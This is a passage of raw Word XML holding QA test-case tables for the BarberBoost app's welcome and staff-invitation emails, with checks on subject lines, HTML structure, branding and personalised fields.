        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2186264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3277656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contains all 3 numbered setup steps (</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>①②③</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="297A2B0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3 present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4ED1D37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2173664" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3088A2E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WEL-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="04DDD9C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4DF9403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includes the shop’s public booking page URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6E20BD3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7908CFC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7F959A3" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F8E905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WEL-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B4436A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52F2088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includes “OPEN MY DASHBOARD” CTA button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A3DE4A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37AC58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607F7C0" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="73F08A8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WEL-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6DFEF50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690A9F7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links to </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>support@barberboost.app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5793E88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604B5BA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EA79CEE" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3AB851A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WEL-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4C2213E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5262EF7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Plain text includes all 3 numbered steps (1. 2. 3.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3888B06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3 present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6EE4E81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9956653" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5F3C3EA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WEL-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="253DB2D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4B01BD5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delivered via Resend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1CC97C0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Resend ID: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>b0c242b1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="78A83F6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bl>
    <w:p w14:paraId="23836D93"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Subject line format:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Welcome to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BarberBoost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — let's get you set up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F57B4" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="510E27EA">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA449D0" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="tc-stf-staff-invitation"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TC-STF — Staff Invitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B09DF5"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Triggered when a new staff member with an email address is added via </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/staff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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7"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="1B786E62"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="3AA8A156"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TC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="72423835"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="71732C88"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Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="6A80512B"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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="57B6D0E3"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2C688E6D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="762F57E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STF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="114B280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0B4AA37B"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subject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is a non-empty string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="496E557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28D271E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4247332" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="422CA77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STF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46215F1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0949CD8D"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html</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is &gt; 100 </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F5F45A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 2857 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35010B8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F083DA8" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0563F24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STF-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6652283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78DEB0EE"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text</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> fallback field present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1236959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331 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5314C64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25E1C03" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A322D0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STF-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51F6149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68810E1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&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A077B4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4C1024B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975C986" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0F655F2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STF-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3F00409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07BBEB5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BARBERBOOST</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> branding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4F40C27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0272641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7C3318E3" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36C1025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STF-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2584446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5E404FF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uses </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>brand</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> gold </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6447E9C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35E0629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FE66504" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4F4EBB1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STF-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1A6C60A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4AC4FE2C"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&lt;div&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0257C27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1 pair</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7BCC18F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5D41BB2" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="24BE3E8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STF-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="317135A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5F24307E"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&lt;td&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A65300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8 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66F0901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E75A03D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="253739A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STF-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="52AAB7A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A540CD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contains shop name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="057D23B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2CCF0EC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E3B47B6" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2190F86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STF-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5195B89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77D775C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heading says “You’ve been added to [Shop]”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1FCD8BD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B79799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E5FB57F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="733AFC7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STF-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="38F52C7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30B8929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shows shop name in detail row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="33DCD39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39AE4A2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8508452" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68C2C89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STF-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="139621A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01959A2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shows staff member’s name in detail row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63476A2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45C0963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A6E8C65" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="13F0EF5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STF-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1D19D2B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02B66E1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references the owner’s name (added by X)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
